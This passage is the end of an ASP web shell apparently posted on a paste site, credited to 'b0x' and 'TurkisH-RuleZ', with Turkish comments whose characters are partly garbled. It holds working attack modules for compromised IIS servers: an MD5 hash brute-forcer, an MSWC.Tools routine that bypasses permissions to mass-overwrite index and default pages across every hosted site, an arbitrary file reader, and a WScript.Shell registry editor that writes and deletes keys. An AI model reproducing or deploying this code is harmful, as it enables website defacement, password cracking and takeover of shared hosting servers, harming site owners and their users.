  2560. Call Cookyaz("hash10","has10",hash10)
  2561. inject4 = CInt(session("say"))
  2562. inject3 = 0
  2563. end if
  2564.  
  2565. increment = 0
  2566. sifre = ""
  2567. hashing = ""
  2568. goup=0
  2569. getend=0
  2570.  
  2571. if inject4 = inject3 then
  2572. response.write ("<script>alert(""M?kemmel T?m ?ifreler K?r?ld? ;) by b0x "")</script>")
  2573. response.end()
  2574. end if
  2575.  
  2576. if coding ="" then ' kod olu?tur
  2577. coding = kodolustur(ara1)
  2578. end if
  2579.  
  2580. coding = replace(coding,"x","#")
  2581.  
  2582. if dizi = "" then ' Charset i olu?uturuyorum..
  2583. dizi = diziolustur()
  2584. end if
  2585.  
  2586. Call HashFounded("hash1","has1")
  2587. Call HashFounded("hash2","has2")
  2588. Call HashFounded("hash3","has3")
  2589. Call HashFounded("hash4","has4")
  2590. Call HashFounded("hash5","has5")
  2591. Call HashFounded("hash6","has6")
  2592. Call HashFounded("hash7","has7")
  2593. Call HashFounded("hash8","has8")
  2594. Call HashFounded("hash9","has9")
  2595. Call HashFounded("hash10","has10")
  2596.  
  2597. for t=1 to inject1
  2598. sifre = Sifreyarat(coding,ara1,dizi)
  2599. if salt = "" then
  2600. md5li=UCASE(md5(sifre))
  2601. response.write sifre &" - "& md5li & "<br>"
  2602. else
  2603. md5li=UCASE(md5(salt+sifre))
  2604. response.write salt+sifre &" - "& md5li & "<br>"
  2605. end if
  2606.  
  2607. Call hashyes("hash1","has1",md5li,sifre)
  2608. Call hashyes("hash2","has2",md5li,sifre)
  2609. Call hashyes("hash3","has3",md5li,sifre)
  2610. Call hashyes("hash4","has4",md5li,sifre)
  2611. Call hashyes("hash5","has5",md5li,sifre)
  2612. Call hashyes("hash6","has6",md5li,sifre)
  2613. Call hashyes("hash7","has7",md5li,sifre)
  2614. Call hashyes("hash8","has8",md5li,sifre)
  2615. Call hashyes("hash9","has9",md5li,sifre)
  2616. Call hashyes("hash10","has10",md5li,sifre)
  2617.  
  2618. coding = SonrakiAdim(coding,ara1,dizi)
  2619. 'response.flush
  2620. next
  2621. coding = replace(coding,"#","x")
  2622. if CInt(ara1) <> CInt(ara2)+1 then
  2623. response.write "<META http-equiv=refresh content="&waiting&";URL='"&FilePath&"?mode=41&ara1="&ara1&"&ara2="&ara2&"&dizi="&dizi&"&coding="&coding&"&waiting="&waiting&"&inject1="&inject1&"&salt="&salt&"&inject4="&inject4&"&inject3="&inject3&"'>"
  2624. end if
  2625. response.flush
  2626.  
  2627. CASE 42 'MSWC nesnesi kullan?m?. Permision ge?me ad?na att???m bir adamd?r. bu nesnenin oldu?unu "Scorlex" den edindim. Ara?t?rd?m neler yapar?m diye =) i?te g?r?n neler yap?labiliyormu?uz ;) bununla. uehueh by b0x
  2628. response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"
  2629. tablo30("<b>Hacking with Using MSWCTools 1.0 Developed By TurkisH-RuleZ</b>")
  2630. yazsol("<form action='"&FilePath&"?mode=43' method=post><b>?ndex Yeri : </b><input name='hash2' type='text' value='"&FilePath&"' size=50> (?ndexin Serverdaki virtual yeri)")
  2631. yazsol("<input type=radio name='hash4' checked value='tek'> <b>At?lacak Yer: </b><input name='hash3' type='text' value='default.asp' size=50> (Tek bir yere Yaz.)")
  2632. yazsol("<input type=radio name='hash4' value='multi'> <b>MASS Path: </b><input name='hash6' type='text' value='.\' size=50> (Mass yap?lacak dizin)")
  2633. yazsol("<b>Eklencek Klas?r: </b><input name='hash5' type='text' value='httpdocs\' size=25> (Ek Klas?r girdisi - BO? b?rak?n , bilmiyorsan?z)")
  2634. yazorta("<input name='G?nder_Ej_De_r' value='Yazd?r ko?umm ;) by b0x' type='submit'")
  2635. response.write "</td></tr></table></form>"
  2636. yazorta("<b>Kullan?m? by b0x</b>")
  2637. yazsol("?necelikle, b0x nesnesi kullanmadan bir dosyay? , istenilen yere MSWC nesnesi ile yazd?r?lanabiliniyor. b0x deste?i olmayan bir server da bile, rahat?a bu nesne yard?m? ile index atabilirsiniz. Kimi serverlarda, permison engeline tak?l?r?z yada kls?r? i?ine giremeyiz, yada b0x kullan?m? k?s?tl?d?r. bunlar? A?MAK i?in bu nesneyi kulland?m. Bu nesne ?u an localhost ve 1-2 yerde ?al??t? sa?l?kl? ?ekilde. ?u an TEst s?r?m?nde diyebilirim. Umar?m bu bizim permison =) ge?me yollumuzu ayd?nlat?r ne dersiniz :)) uehueh")
  2638. yazsol("<b>index yeri -></b>Buray? fiziksel yeri Writing YIN SAKIN. oraya indexinizin virtual yerini yani. Kulland???n?z b0x dizinine olan PathUNU yaz?n indexin yani. Bu b0x ile ayn? yerde ise, 'hacked.html' e?er alt klas?rde ise -> '..\hacking.html', '..\..\..\b0x\www\hacking.html',yada \news\hacking.html gibi belirtmeniz gerek.Pathunu b?yle belirlemeniz gerekiyor. 'C:\ss\ss\hacking.html' yapt???n?zda i?lem ger?ekle?mezz.. <b>YADA size ?NER?m -> kulland???n?z b0x yu istedi?inzi yere server daki bir ba?kas siteye copyalat?rr?san?z , , bu sefer b0x yu o site ?zeridnen ?al??t?rr?rsan?z PErmsion ? a?m?? olursunuz o site i?in.</b>")
  2639. yazsol("<b>At?lacak yer ->></b> TEK bir hedef i?in. Buray?da ..\..\ ?eklinde inerek belirtmeniz gerekiyor.mesela '..\..\..\index.asp' 3 dizin a?a??ya iner ve index i atar yada '..\..\..\www\index.asp' 3 dizin iner ww dizine girer , index i atar. =) b?yle OLAMAK zorunda . ")
  2640. yazsol("<b>MASS Path ->></b> BUrda ?oklu alt klas?rlerede index atmak i?in geli?tirdim. '..\..\..\' ?eklinde a?a??lara inin ve TUM sietelerin L?Stelendi?i klas?r ee kadar olan '..\' i?aretini ayarlay?n. mesela 3 dizin a?a??da ise b0x olan uzakl???, '..\..\..\' yaz?n yeterdir =) . <b>Eklenecek klas?r-></b> burda da, TUm sietlere giri? yap?ld?kdan sonraki Klas?r ad? , mesela 'www' yada 'http' yada 'wwwroot' gibi.")
  2641. yazsol("Neden b?yle derseniz, MSWC nin kullan?m?, destekleid?i ?ekil b?yledir. Biraz kafa kar??t?r?c?. Ama ben denedim g?rd?m =) memnun kald?m. O y?zden bu b0x da yerini ald?. ?undan eminimki kullan?m?n? deneyerek ??rendi?inizde, sizinde PErmsion ge?mede vazge?ilmeziniz olacakd?r =) euheuh")
  2642. yazorta("Biraz zor oldu be <b>b0x</b> for giving idea about MSWC Component")
  2643. yazorta("<b>Coding & Development & Algorithms Made by b0x</b>")
  2644.  
  2645. CASE 43 'MSWC i?leniyor =)
  2646. on error resume next
  2647. Set utils = Server.CreateObject("MSWC.Tools")
  2648. if err <> 0 then
  2649. olmadi("MSWC.tools deste?i yoktur bu server?n.")
  2650. end if
  2651. if hash4 = "tek" then
  2652. on error resume next
  2653. utils.ProcessForm hash3, hash2
  2654. if err <>0 then
  2655. olmadi("Ba?ar?s?z. Belirti?iniz virtual path lar do?rumu emin olun. MSWC deste?i var ??nk? server ?n.")
  2656. else
  2657. oldu("Ba?ard?n?z ;) i?lem ger?ekle?tii.")
  2658. end if
  2659. else
  2660. on error resume next
  2661. Set f = b0x.GetFolder(FolderPath)
  2662. Set fc = f.SubFolders
  2663. if err<>0 then
  2664. olmadi("bu klas?r e b0x nesnesi ile tarama yap?lam?yor. ?nce okunmal?, sonra MSWC devreye girer.")
  2665. end if
  2666. For Each f1 In fc
  2667. on error resume next
  2668. mevki = hash6+f1.name+"\"+hash5+"default.asp"
  2669. utils.ProcessForm mevki, hash2
  2670. mevki = hash6+f1.name+"\"+hash5+"index.asp"
  2671. utils.ProcessForm mevki, hash2
  2672. mevki = hash6+f1.name+"\"+hash5+"default.htm"
  2673. utils.ProcessForm mevki, hash2
  2674. mevki = hash6+f1.name+"\"+hash5+"index.html"
  2675. utils.ProcessForm mevki, hash2
  2676. mevki = hash6+f1.name+"\"+hash5+"b0x.html"
  2677. utils.ProcessForm mevki, hash2
  2678. mevki = hash6+f1.name+"\"+hash5+"index.htm"
  2679. utils.ProcessForm mevki, hash2
  2680. if err<>0 then
  2681. response.write "<table width=""100%""><tr><td class=""kbrtm""> "& hash6+f1.name+"\"+hash5&" <font color=#FE7A84> Noo :( !! <font class=""k1"">?</font></td></tr></table>"
  2682. else
  2683. response.write "<table width=""100%""><tr><td class=""kbrtm""> "& hash6+f1.name+"\"+hash5&" <font color=#C6FCBE> OK !! <font class=""k1"">?</font></td></tr></table>"
  2684. end if
  2685. response.flush
  2686. Next
  2687. yazorta("<b>??lem Tamamland?. Developed By TurkisH-RuleZ</b>")
  2688. end if
  2689.  
  2690. CASE 44 'XMLHTTP l? dosya Reading .
  2691. if inject2 = "ok" then
  2692. mevki = hash2
  2693. else
  2694. mevki = Fullpath
  2695. end if
  2696. response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"
  2697. tablo30("<b>Reading Files by using XMLHTTP 1.0 Developed By TurkisH-RuleZ</b>")
  2698. yazsol("<form action='"&FilePath&"?mode=44' method=post><input name='inject2' value='ok' type='hidden'><b>File Path : </b><input name='hash2' type='text' value='"&mevki&"' size=60><input name='goruntule_by_A_l_f_o' value='.: Go :.' type='submit'>")
  2699. response.write "</td></form></tr></table>"
  2700. if not inject2 = "ok" then
  2701. yazsol("Hint : This is Private a Private Tool For Reading Files On Windows IIS Server ... :) ")
  2702. yazsol("wWw.Sec-b0x.CoM")
  2703. else
  2704. response.write "<textarea style='width:100%;height:470;' >"
  2705. on error resume next
  2706. Set b0x = Server.CreateObject("Microsoft.XMLHTTP")
  2707. b0x.Open "GET", hash2, false
  2708. b0x.Send
  2709. if err=0 then
  2710. Response.Write Server.HTMLEncode(b0x.ResponseText)
  2711. else
  2712. response.write "Yazd???n?z adres bulunamad? . ?? bir kontrol yap Developed By TurkisH-RuleZ"
  2713. end if
  2714. response.write "</textarea>"
  2715. end if
  2716. yazorta("<b>Developed By TurkisH-RuleZ</b>")
  2717.  
  2718. CASE 45 'Registiry Edit?r =) by A L F O N S O F E E L T H E P O W E R O F T U R K S
  2719. response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"
  2720. tablo30("<b>REGISTRY EDITOR 2.0 Developed By TurkisH-RuleZ</b>")
  2721. tablo30("<br><b>REGister lara Writing & Ekleme</b>")
  2722. yazsol("<form action='"&FilePath&"?mode=45' method=post><input name='inject2' value='yaz' type='hidden'><b>Mevki/Key : </b><input name='hash2' type='text' value='' size=85><br> (?rnek: HKLM\SOFTWARE\Microsoft\b0x.COM)")
  2723. yazsol("De?er/Value: <input name='hash3' value='' type='text'>")
  2724. yazsol("TUr/Type: <select name='hash4'><option value=1>REG_SZ</option><option value=2>REG_DWORD</option><option value=3>REG_BINARY</option><option value=4>REG_EXPAND_SZ</option><option value=5>REG_MULTI_SZ</option></select> &nbsp;&nbsp;&nbsp;&nbsp; <input name='SaVS55A_K_CoM' value='..:: YAZDIR ::..' type='Submit'>")
  2725. response.write "</td></form></tr></table>"
  2726. yazsol("<table><tr><td>Root Key Name</td><td>Kar??l???</td></tr><tr><td>HKEY_CURRENT_USER</td><td>HKCU</td></tr><tr><td>HKEY_LOCAL_MACHINE</td><td> HKLM </td></tr><tr><td>HKEY_CLASSES_ROOT</td><td>HKCR</td></tr><tr><td>HKEY_USERS</td><td>HKEY_USERS </td></tr><tr><td>HKEY_CURRENT_CONFIG</td><td>HKEY_CURRENT_CONFIG </td></tr></table>")
  2727. yazsol("REG_SZ -> String(kelime) / REG_DWORD -> ?nteger(Say?) / REG_BINARY -> Binary / REG_EXPAND_SZ -> Multi String / REG_MULTI_SZ -> Aeeay String")
  2728. response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"
  2729. tablo30("<br><b>Register lardan Reading & S?L Coded Developed By TurkisH-RuleZ</b>")
  2730. yazsol("<form action='"&FilePath&"?mode=45' method=post><input name='inject2' value='oku' type='hidden'><b>Mevki/Key : </b><input name=""hash5"" type='text' value='' size=85><br> (?rnek: HKLM\SOFTWARE\Microsoft\b0x_WAS_HERE)")
  2731. yazorta("<input value='oku' name='hash6' type='radio' checked> OKU - <input value='sil' name='hash6' type='radio'> S?L &nbsp;&nbsp;&nbsp;&nbsp; <input name='SaVSA_K_CoM_' value='..:: OKU/S?L ::..' type='Submit'>")
  2732. response.write "</td></form></tr></table>"
  2733. on error resume next
  2734. Set SaVSaK = Server.CreateObject("WScript.Shell")
  2735. if err <> 0 then
  2736. olmadi("Server da WScript.SHell kullan?m?na ?zin vermemektedir. ??lem ba?ar?s?z.")
  2737. response.end()
  2738. end if
  2739. if inject2 = "yaz" then
  2740. on error resume next
  2741. Select Case CInt(hash4)
  2742. Case 1
  2743. hash9 = SaVSaK.RegWrite (Trim(hash2), Trim(hash3), "REG_SZ")
  2744. Case 2
  2745. hash9 = SaVSaK.RegWrite (Trim(hash2), CInt(Trim(hash3)), "REG_DWORD")
  2746. Case 3
  2747. hash9 = SaVSaK.RegWrite (Trim(hash2), CInt(Trim(hash3)), "REG_BINARY")
  2748. Case 4
  2749. hash9 = SaVSaK.RegWrite (Trim(hash2), Trim(hash3), "REG_EXPAND_SZ")
  2750. Case 5
  2751. hash9 = SaVSaK.RegWrite (Trim(hash2), Trim(hash3), "REG_MULTI_SZ")
  2752. End Select
  2753. if err <> 0 then
  2754. olmadi("??lem ger?ekle?tirilemedi. VALUE de?erinin do?ru ve uygun Value girid?inziden emin ol.")
  2755. else
  2756. oldu(" <b>"+hash2+"</b><br> adresine register yaz?ld?. ")
  2757. end if
  2758.  
  2759. else if inject2 = "oku" then
  2760. if hash6 = "oku" then
  2761. yazorta("Mevki/Key: <b>"&Trim(hash5)&"</b>")
  2762. on error resume next
  2763. response.write "<center>De?er/Value: <b>"
  2764. response.write SaVSaK.RegRead (Trim(hash5))
  2765. response.write "</b></center>"
  2766. if err<>0 then
  2767. olmadi("Kay?t Register larda bulunamad?...")
  2768. end if
  2769. else if hash6 = "sil" then
  2770. yazorta("Mevki/Key: <b>"&Trim(hash5)&"</b>")
  2771. on error resume next
  2772. hash9 = SaVSaK.RegDelete (Trim(hash5))
  2773. if err<>0 then
  2774. olmadi("Registerlardan Silinemedi. KEy yanl?? olabilir. yada kay?t bulanamad?.")
  2775. else
  2776. oldu("Ba?ar?yla Silindi. ")
  2777. end if
  2778. end if
  2779. end if
  2780.  
  2781. end if
  2782. end if
  2783. yazortaa("<b>Coded by b0x - Cyber-Warrior</b>")
  2784.  
  2785.  
  2786. END SELECT
  2787.  
  2788.  
  2789. if popup = False AND nolist = False then
  2790. response.write "<br><br>"
  2791. response.write "<div style=""z-index:150; position:absolute"">"
  2792. Call KlasorOku()
  2793. response.write "</div><div align=""right"">"
  2794. Call DosyaOku()
  2795. response.write "</div>"
  2796. end if
  2797.  
  2798. if popup = False then
  2799. response.write "<br><br><center><table cellpadding=""0"" cellspacing=""0"" width=""160"">"
  2800. response.write "<tr><td class=""kbrtm"" height=""20"" style=""background-color:121212"" align=""center""><b>b0x Disk'z</b></td></tr>"
  2801. Call Suruculer
  2802. response.write "</table></center><br><br>"
  2803. Call SurucuInfo
  2804. yazortaa("<b>Coded by Alfso ... Developed By <a href=""mailto:z1dsdf@Gm45ail.CoM""> TurkisH-RuleZ")
  2805. yazorta("<center>wWw.Sec-b0x.coM")
  2806. end if
  2807. %>
  2808. <br><Center><Font Face='Wingdings' Size='7' Color = 'FFFFFF'><b> ??µ </b></Font></Center>
  2809.  
  2810. <br><Center><Font Face='Wingdings' Size='7' Color = 'FFFFFF'><b> ?µ </b></Font></Center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement